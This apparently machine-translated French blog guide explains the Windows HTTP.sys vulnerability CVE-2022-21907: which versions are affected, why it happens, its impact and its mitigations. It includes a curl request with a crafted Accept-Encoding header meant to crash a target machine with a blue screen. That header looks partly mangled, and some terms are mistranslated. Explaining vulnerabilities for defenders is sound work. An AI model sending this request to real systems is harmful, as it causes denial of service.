La reconnaissance des modèles est ce que des centaines de spécialistes de la sécurité de notre communauté ont voté comme la compétence à cultiver pour une carrière enrichissante en infosec. Bien que nous ayons certaines capacités innées de reconnaissance de formes, il est essentiel de les développer – et c’est une question de pratique.
Travailler dans la sécurité offensive vous offre de nombreuses opportunités de le faire, avec de nouvelles vulnérabilités prêtes à être examinées de près. Alors allons-y et faisons exactement cela tout en découvrant comment ce CVE transporte les échos d’une autre vulnérabilité d’il y a quelque temps.
Qu’est-ce que CVE-2022-21907 ?
CVE-2022-21907 (CVSSv3 9.8) est une vulnérabilité critique qui affecte la pile de protocoles HTTP (HTTP.sys).
Attendez, qu’est-ce que HTTP.sys ? Eh bien, HTTP.sys est un pilote de périphérique du noyau présent dans les systèmes d’exploitation Microsoft Windows modernes, qui est responsable de la gestion du trafic HTTP dans des services tels que Microsoft IIS.
La plupart des recherches effectuées sur cette vulnérabilité ont révélé que vous pouvez déclencher le tristement célèbre crash de l’écran bleu de la mort dans la machine sous-jacente qui exécute un pilote HTTP.sys non corrigé.
Cela semble un peu familier, non ? Oui! Certains d’entre vous ont peut-être déjà pensé à CVE-2021-31166 qui est assez similaire à notre vulnérabilité actuelle.
Pour ceux d’entre vous qui ne se souviennent pas de ce CVE du 21 mai 2021, il s’agit d’une autre vulnérabilité dans la pile de protocoles HTTP causée par un type de bogue d’utilisation après libération que les attaquants peuvent également « armer » – avec le bon exploiter – et provoquer à nouveau l’écran bleu de la mort.
En termes d’étendue de la vulnérabilité, Microsoft souligne que cette CVE peut être trouvée dans différentes versions de Windows 10, Windows 11, Windows Server 2019 et Windows Server 2022.
Bien que Windows 10 1809 et Windows Server 2019 ne soient pas vulnérables par défaut, ils peuvent toujours être compromis si HTTP Trailer Support est activé via la valeur de registre EnableTrailerSupport que vous pouvez trouver sous HKEY LOCAL MACHINE\System\CurrentControlSet\Services\HTTP\Parameters.
La perturbation que cette vulnérabilité peut causer est plutôt grave et, bien que les systèmes puissent redémarrer et fonctionner correctement après une attaque, des attaques ultérieures pourraient entraîner un déni de service complet .
Comment fonctionne CVE-2022-21907 ?
Selon l’analyse plus approfondie effectuée par les chercheurs de Trellix , ce qui fait fonctionner le CVE-2022-21907 est une vulnérabilité de mémoire non initialisée dans les fonctions suivantes : UlpAlllocateFactTracker & UlAllocateFastTrackerToLookaside.
En ne mettant pas à zéro la mémoire allouée dans UlpAlllocateFactTracker et UlAllocateFastTrackerToLookaside, les attaquants peuvent injecter des charges utiles malveillantes dans les zones non initialisées.
Versions de Windows avec un pilote HTTP.sys vulnérable
| Sortie | Vulnérable par défaut |
| Windows 10 20H2 | ✔ |
| Windows 10 21H1 | ✔ |
| Windows 10 21H2 | ✔ |
| Windows 11 | ✔ |
| Serveur Windows 20H2 | ✔ |
| Serveur Windows 2022 | ✔ |
| Windows 10 1809 | Nécessite l’activation de la prise en charge de la bande-annonce HTTP |
| Serveur Windows 2019 | Nécessite l’activation de la prise en charge de la bande-annonce HTTP |
Impact commercial de CVE-2022-21907
À l’heure actuelle, aucun exploit n’a été publié pouvant être utilisé pour accéder à distance à une cible vulnérable. Cependant, certains exploits PoC accessibles au public peuvent entraîner un déni de service.
Les propriétaires d’entreprise et les organisations qui ne veulent pas perdre l’accès aux systèmes critiques et aux données sensibles sont tenus de maintenir leurs appareils à jour afin d’éliminer le risque de DoS causé par un acteur malveillant.
Comment déclencher manuellement BSoD avec CVE-2022-21907
Si vous souhaitez voir ce CVE en action et que vous disposez d’une machine virtuelle Windows de rechange, vous pouvez effectuer la requête suivante avec curl sur l’adresse IP de la machine virtuelle.
curl 192.168.0.164:80 -sH "Accept-encoding: 354429474810858105277502,753225473272192695969091599085146218998458873428858279498120&68&**82302744837636557755**9,2120453047251623940869443373783750655190662992171177571578371548748405709,03504570598828001819032433815484769110241925758402724193417475718971298,895259892660286842061499776,****************************267816, *, ,"Je tiens à remercier nu11secur1ty d’avoir d’abord publié une preuve de concept Python de l’exploit qui a aidé à lancer nos recherches pour ce CVE.
Voici la commande en action :
Le tableau ci-dessus vous aidera à déterminer si votre machine disponible est vulnérable ou non, ou vous guidera dans le choix d’une version vulnérable pour vos recherches ultérieures.
Comment atténuer CVE-2022-21907
Si vous avez une machine exécutant Windows Server 2019 ou Windows 10 version 1809, une atténuation rapide est disponible.
Comme mentionné ci-dessus, ces deux versions sont vulnérables si le HTTP Trailer Support est activé, donc pour atténuer l’attaque, on pourrait simplement modifier le registre EnableTrailerSupport .
Pour supprimer la vulnérabilité, les utilisateurs doivent installer les mises à jour de sécurité publiées par Microsoft qui corrigent le problème.
Ayez un processus pour votre « folie »
Avoir une méthode pour assouvir votre curiosité vous servira toujours. C’est pourquoi je vous encourage à « voler » l’approche que nous proposons dans les guides de test de sécurité et d’exploitation éthique que nous publions. Il n’est pas nécessaire de repartir de zéro et vous pouvez progresser plus rapidement si vous itérez et améliorez un framework donné. Essayé et testé par votre serviteur !
A bientôt avec d’autres guides comme celui-ci !
PS : Nous les mettons également à jour de temps en temps, alors marquez celui-ci ou tout autre auquel vous souhaitez revenir plus tard.
